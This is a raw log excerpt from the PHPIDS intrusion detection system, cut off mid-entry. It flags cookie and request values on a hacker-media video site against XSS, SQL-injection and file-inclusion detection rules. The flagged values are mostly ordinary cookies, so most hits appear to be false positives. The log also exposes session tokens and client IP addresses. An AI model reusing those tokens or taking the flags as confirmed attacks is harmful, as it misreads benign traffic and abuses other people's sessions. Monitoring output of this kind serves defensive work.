Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23

ID:59121
Name:COOKIE.Apache
Value:"D~8f9483ec2747dc8c7bcc3a33b91812a7"
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.3333333333333

ID:59122
Name:COOKIE.OAGEO
Value:DE||||||||||
Page:/i.php?page=videos%2Fpn12%2Fdarren-kitchen-lessons-learned-in-hacker-media
IP:213.239.214.213
Impact:234
Created:2009-11-07 17:37:31
Details:
Description: Detects obfuscated JavaScript script injections | Tags: xss, csrf | ID: 25

ID:59123
Name:REQUEST.PREF
Value:ID=9338396f7462b2fa:TM=1257603647:LM=1257603647:S=355PCtcessSqQ-Q0
Page:/i.php?page=videos%2Fpn12%2Fphreaknic-12-videos
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects data: URL injections and common URI schemes | Tags: xss, rfe | ID: 27

ID:59124
Name:REQUEST._ui-patterns_com_session
Value:BAh7BiIKZmxhc2hJQzonQWN0aW9uQ29udHJvbGxlcjo6Rmxhc2g6OkZsYXNo SGFzaHsABjoKQHVzZWR7AA==--d732d3aa7f25adf20bd38d79cca6edaa49f9708a
Page:/i.php?page=videos%2Fpn12%2Fphreaknic-12-videos
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:31
Details:
Impact: 10 | Tags: xss, csrf, id, rfe, lfi
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35
Description: Detects unknown attack vectors based on PHPIDS Centrifuge detection | Tags: xss, csrf, id, rfe, lfi | ID: 67

Centrifuge detection data
Threshold: 3.49
Ratio: 2.125

ID:59125
Name:REQUEST.language
Value:--
Page:/i.php?page=videos%2Fpn12%2Fphreaknic-12-videos
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:31
Details:
Description: Detects common comment types | Tags: xss, csrf, id | ID: 35

ID:59126
Name:REQUEST.Cart
Value:PHRoutine=10&Referer=&Landing=http://www.tigerdirect.com/applications/searchtools/item-details.asp?EdpNo=3718396&SRCCODE=WEBRSS013&cm_mmc=RSS-_-TigerDirect-_-Category-_-TopSellers
Page:/i.php?page=videos%2Fpn12%2Fphreaknic-12-videos
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects url injections and RFE attempts | Tags: id, rfe, lfi | ID: 61

ID:59127
Name:REQUEST.DB
Value:msRandX=71&ItemDetailsBeta=Y&msProduct=1782427&Surveyflag=1&msImageID=/microsoft/MSelasticity-bnr_430x150C.jpg&msImageSC=/microsoft/MSelasticity-bnr_620x150C.jpg
Page:/i.php?page=videos%2Fpn12%2Fphreaknic-12-videos
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:31
Details:
Description: Detects JavaScript location/document property access and window access obfuscation | Tags: xss, csrf | ID: 23
Description: Detects common XSS concatenation patterns 1/2 | Tags: xss, csrf, id, rfe | ID: 30
Description: Detects nullbytes and HTTP response splitting | Tags: id, rfe, xss | ID: 39

ID:59128
Name:REQUEST.cm__tracker
Value:a:1:{i:0;s:27:"/gallery/entry/2919/kasian/";}
Page:/i.php?page=videos%2Fpn12%2Fphreaknic-12-videos
IP:87.118.122.165
Impact:262
Created:2009-11-07 17:37:31
Details:
Description: Detects basic SQL authentication bypass attempts 2/3 | Tags: sqli, id, lfi | ID: 45

ID:59129
Name:REQUEST.CFGLOBALS
Value: